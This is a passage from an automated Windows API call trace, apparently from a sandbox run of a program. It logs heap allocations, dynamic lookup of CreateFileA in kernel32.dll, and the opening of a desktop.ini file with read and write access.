Flags=0x0, Size=0x8) returned 0x7af558 [0029.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0029.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0029.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0029.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0029.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0029.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0029.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0029.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0029.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0029.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0029.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0029.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0029.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0029.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0029.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0029.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0029.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0029.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0029.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0029.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0029.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0029.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0029.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0029.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0029.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0029.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0029.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0029.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0029.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0029.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0029.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0029.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0029.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0029.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0029.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0029.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0029.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0029.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0029.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0029.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0029.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0029.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0029.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0029.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0029.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0029.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0029.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0029.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0029.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0029.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0029.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0029.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0029.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0029.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0029.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0029.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0029.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0029.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0029.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0029.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0029.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0029.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0029.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0029.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0029.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0029.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0029.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0029.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0029.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0029.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0029.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0029.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0029.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0029.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0029.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0029.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0029.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0029.928] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0029.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0029.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0029.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0029.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0029.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0029.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0029.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0029.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0029.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0029.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0029.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0029.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0029.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0029.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0029.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0029.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0029.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0029.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0029.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0029.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0029.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0029.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0029.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0029.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0029.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0029.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0029.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0029.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0029.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0029.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0029.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0029.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0029.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0029.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0029.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0029.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0029.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0029.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0029.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0029.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0029.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0029.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0029.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0029.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0029.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0029.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0029.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0029.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0029.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0029.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0029.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0029.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0029.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0029.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0029.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0029.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0029.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0029.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0029.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0029.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0029.931] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0029.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0029.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0029.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88ca00 [0029.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88ca00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0029.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0029.931] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0029.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0029.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0029.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0029.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0029.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0029.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0029.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0029.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca00 [0029.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88ca00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0029.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0029.931] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0029.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0029.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0029.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0029.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0029.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0029.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0029.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0029.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0029.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0029.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0029.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0029.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x88ffb0 [0029.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0029.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x32) returned 0x7c2080 [0029.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini", cchWideChar=50, lpMultiByteStr=0x7c2080, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini", lpUsedDefaultChar=0x0) returned 50 [0029.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0029.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0029.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0029.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0029.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0029.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0029.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0029.932] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0029.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0029.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0029.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0029.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0029.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0029.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0029.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0029.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0029.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0029.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0029.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0029.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0029.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0029.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0029.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=50, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0029.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x64) returned 0x7c10a8 [0029.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=50, lpWideCharStr=0x7c10a8, cchWideChar=50 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini") returned 50 [0029.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0029.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0029.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c10a8 | out: hHeap=0x770000) returned 1 [0029.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0029.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0029.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0029.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0029.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0029.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0029.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0029.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0029.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0029.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0029.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0029.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0029.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0029.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0029.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0029.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0029.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0029.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0029.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0029.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0029.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0029.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0029.934] 